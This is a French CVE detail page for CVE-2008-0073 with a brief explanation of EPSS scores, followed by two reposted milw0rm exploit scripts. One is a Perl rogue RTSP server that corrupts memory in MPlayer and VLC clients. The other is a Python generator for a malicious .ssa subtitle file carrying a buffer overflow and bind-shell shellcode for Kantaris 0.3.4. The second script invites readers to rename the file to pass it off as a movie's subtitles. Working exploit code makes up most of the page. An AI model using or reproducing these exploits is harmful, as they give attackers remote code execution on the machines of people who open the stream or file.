CVE-2008-0073 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

#!/usr/bin/perl # Huston, mplayer got some vulns! :( # CVE-2008-0073 also apply to mplayer and vlc with some distinctions. # # Assuming kernel.va_randomize=0 this overwrite EIP with a "stream" structure on my box. # # The first element of the "stream" structure is a user-supplied buffer so it is not really useful to overwrite # EIP, let's find the right target: we can overwrite every memory location beyond the desc->stream pointer and # some before it. # # Vulnerable code: # sdpplin_parse_stream() # desc->stream_id=atoi(buf); # spplin_parse() # desc->stream[stream->stream_id]=stream; # # Test: # - mplayer rtsp://evilhost/evil.rm # eax 0xa0737008 // pointer to desc->stream # edx 0x0495badd // "streamid" value # edi 0x089b59e8 // pointer to stream # # <sdpplin_parse+731>: mov DWORD PTR [eax+edx*4],edi use warnings; use strict; use IO::Socket; my $evil_num = "127467297"; # this is a 4byte offset from desc->stream my $rtp_hello = "RTSP/1.0 200 OK\r\n". "CSeq: 1\r\n". "Date: Thu, 20 Mar 2008 20:07:39 GMT\r\n". "Server: RealServer Version 9.0.2.794 (sunos-5.8-sparc-server)\r\n". "Public: OPTIONS, DESCRIBE, ANNOUNCE, PLAY, SETUP, GET_PARAMETER, SET_PARAMETER, TEARDOWN\r\n". "RealChallenge1: de6654ba4935b8b9d8af3ba8d6f8e71c\r\n". "StatsMask: 3\r\n\r\n"; my $rtp_evil = "RTSP/1.0 200 OK\r\n". "CSeq: 2\r\n". "Date: Thu, 20 Mar 2008 20:08:34 GMT\r\n". "vsrc: http://0.00.00.00:31337\r\n". "Content-base: rtsp://0.00.00.00:554/bu.rm\r\n". "ETag: 55370-2\r\n". "Session: 93033-2\r\n". "Content-type: application/sdp\r\n". "Content-length: 677\r\n\r\n". "v=0\r\n". "o=-1028652722 1028652722 IN IP4 0.00.00.00\r\n". "s=realmp3\r\n". "i=<No author> <No copyright>\r\n". "c=IN IP4 0.0.0.0\r\n". "t=0 0\r\n". "a=SdpplinVersion:1610645242\r\n". "a=StreamCount:integer;\"1166000000\"\r\n". "a=Title:buffer;\"dtFabH2rNoP=\"\r\n". "a=range:npt=0-39.471000\r\n". "m=audio 0 RTP/AVP 101\r\n". # this is referenced by "stream" "b=AS:128\r\n". "a=control:streamid=$evil_num\r\n". "a=range:npt=0-39.471000\r\n". "a=length:npt=39.471000\r\n". "a=rtpmap:101 X-MP3-draft-00/1000\r\n". "a=mimetype:string;\"audio/X-MP3-draft-00\"\r\n". "a=StartTime:integer;0\r\n". "a=AvgBitRate:integer;128000\r\n". "a=SampleRate:integer;44100\r\n". "a=AvgPacketSize:integer;417\r\n". "a=Preroll:integer;1000\r\n". "a=NumChannels:integer;2\r\n". "a=MaxPacketSize:integer;1024\r\n". "a=ASMRuleBook:string;\"AverageBandwidth=128000, AverageBandwidthStd=0, Priority=9;\"\r\n"; my @resps = ( $rtp_hello, $rtp_evil, "RTSP/1.0 200 OK\r\n". "CSeq: 3\r\n". "Date: Sat, 22 Mar 2008 20:45:47 GMT\r\n". "Session: 93033-2\n\r". "Reconnect: true\n\r". "RealChallenge3: 2520b5cd0e5e5622ec25f563312aba3e4f213d09,sdr=2b05ef3b\n\r". "RDTFeatureLevel: 2\r\n". "Transport: x-pn-tng/tcp;interleaved=0\r\n\r\n", "RTSP/1.0 200 OK\r\n". "CSeq: 4\r\n". "Date: Sat, 22 Mar 2008 15:11:06 GMT\r\n". "Session: 93033-2\r\n\r\n", "RTSP/1.0 200 OK\r\n". "CSeq: 5\r\n". "Date: Sat, 22 Mar 2008 15:11:06 GMT". "RTP-Info: url=rtsp://0.00.00.00/bu.rm\r\n\r\n", ); my $sock = IO::Socket::INET->new(LocalAddr => '0.0.0.0', LocalPort => '554', Listen => 1, Reuse => 1); while(my $csock = $sock->accept) { foreach my $resp(@resps) { my $buf = read_from_sock($csock); print $csock $resp; } } sub read_from_sock() { my ($sock) = @_; my $buffer = ""; while(<$sock>) { return $buffer if /^\r\n$/; $buffer .= $_; } return $buffer; } # milw0rm.com [2008-03-25]

#!/usr/bin/python # # Kantaris 0.3.4 Media Player Local Buffer Overflow [0day!] # # The following exploit will make a film.ssa file, # just rename the file with the name of your movie, and use your imagination # to pwn! :) # Shellcode is local bind shell, just telnet to port:4444 to get command prompt :) # # BIG thanks to muts <muts[at]offensive-security[dot]com> for helping # and discovering a very interesting thing that we will publish soon # # I piss on your Business Networks course Igor Radusinovic! Go to hell! # # Vulnerability discovered by Muris Kurgas a.k.a. j0rgan # jorganwd [at] gmail [dot] com # http://www.jorgan.users.cg.yu import os jmp = '\xCC\x59\xFB\x77' # Windows XP sp1 JMP ESP, u can change it... # win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum sc=("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e" "\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x48" "\x4e\x36\x46\x52\x46\x32\x4b\x38\x45\x54\x4e\x43\x4b\x48\x4e\x37" "\x45\x50\x4a\x37\x41\x50\x4f\x4e\x4b\x38\x4f\x44\x4a\x51\x4b\x38" "\x4f\x45\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x43\x4b\x48" "\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c" "\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" "\x46\x4f\x4b\x33\x46\x55\x46\x52\x4a\x32\x45\x57\x45\x4e\x4b\x48" "\x4f\x35\x46\x42\x41\x30\x4b\x4e\x48\x36\x4b\x58\x4e\x50\x4b\x44" "\x4b\x48\x4f\x45\x4e\x51\x41\x50\x4b\x4e\x43\x50\x4e\x52\x4b\x48" "\x49\x38\x4e\x36\x46\x42\x4e\x51\x41\x46\x43\x4c\x41\x33\x4b\x4d" "\x46\x56\x4b\x58\x43\x54\x42\x33\x4b\x48\x42\x34\x4e\x50\x4b\x38" "\x42\x57\x4e\x31\x4d\x4a\x4b\x38\x42\x34\x4a\x50\x50\x35\x4a\x36" "\x50\x48\x50\x54\x50\x50\x4e\x4e\x42\x55\x4f\x4f\x48\x4d\x48\x56" "\x43\x35\x48\x56\x4a\x56\x43\x53\x44\x53\x4a\x36\x47\x37\x43\x57" "\x44\x33\x4f\x55\x46\x35\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e" "\x4e\x4f\x4b\x53\x42\x35\x4f\x4f\x48\x4d\x4f\x45\x49\x48\x45\x4e" "\x48\x46\x41\x58\x4d\x4e\x4a\x50\x44\x30\x45\x55\x4c\x46\x44\x50" "\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x55" "\x4f\x4f\x48\x4d\x43\x45\x43\x45\x43\x55\x43\x55\x43\x45\x43\x34" "\x43\x55\x43\x34\x43\x55\x4f\x4f\x42\x4d\x48\x46\x4a\x56\x41\x51" "\x4e\x55\x48\x46\x43\x45\x49\x58\x41\x4e\x45\x49\x4a\x56\x46\x4a" "\x4c\x51\x42\x47\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x56\x42\x31" "\x41\x45\x45\x45\x4f\x4f\x42\x4d\x4a\x46\x46\x4a\x4d\x4a\x50\x52" "\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x35\x4f\x4f\x42\x4d" "\x4a\x36\x45\x4e\x49\x34\x48\x38\x49\x54\x47\x45\x4f\x4f\x48\x4d" "\x42\x45\x46\x55\x46\x35\x45\x55\x4f\x4f\x42\x4d\x43\x59\x4a\x46" "\x47\x4e\x49\x57\x48\x4c\x49\x47\x47\x35\x4f\x4f\x48\x4d\x45\x45" "\x4f\x4f\x42\x4d\x48\x56\x4c\x46\x46\x56\x48\x46\x4a\x36\x43\x36" "\x4d\x56\x49\x38\x45\x4e\x4c\x56\x42\x55\x49\x55\x49\x42\x4e\x4c" "\x49\x58\x47\x4e\x4c\x36\x46\x54\x49\x58\x44\x4e\x41\x43\x42\x4c" "\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x54\x4e\x42" "\x43\x49\x4d\x48\x4c\x47\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46" "\x44\x57\x50\x4f\x43\x4b\x48\x31\x4f\x4f\x45\x37\x46\x54\x4f\x4f" "\x48\x4d\x4b\x55\x47\x55\x44\x45\x41\x55\x41\x55\x41\x35\x4c\x46" "\x41\x30\x41\x35\x41\x55\x45\x55\x41\x35\x4f\x4f\x42\x4d\x4a\x46" "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x36" "\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x58\x47\x35\x4e\x4f" "\x43\x48\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x35\x4f\x4f\x42\x4d" "\x4a\x36\x42\x4f\x4c\x38\x46\x50\x4f\x35\x43\x55\x4f\x4f\x48\x4d" "\x4f\x4f\x42\x4d\x5a") bafer = '\x41' * 163868 + jmp + "\x90" * 32 + sc fileHandle = open ( 'film.ssa', 'w' ) fileHandle.write ( '[Script Info]\n') fileHandle.write ( 'ScriptType: v4.00\n') fileHandle.write ( 'Title: Kantaris 0.3.4 buffer-overflow\n') fileHandle.write ( 'Collisions: Normal\n\n') fileHandle.write ( '[V4 Styles]\n\n') fileHandle.write ( '[Events]\n') fileHandle.write ( 'Dialogue: '+ bafer) fileHandle.close() # milw0rm.com [2008-04-25]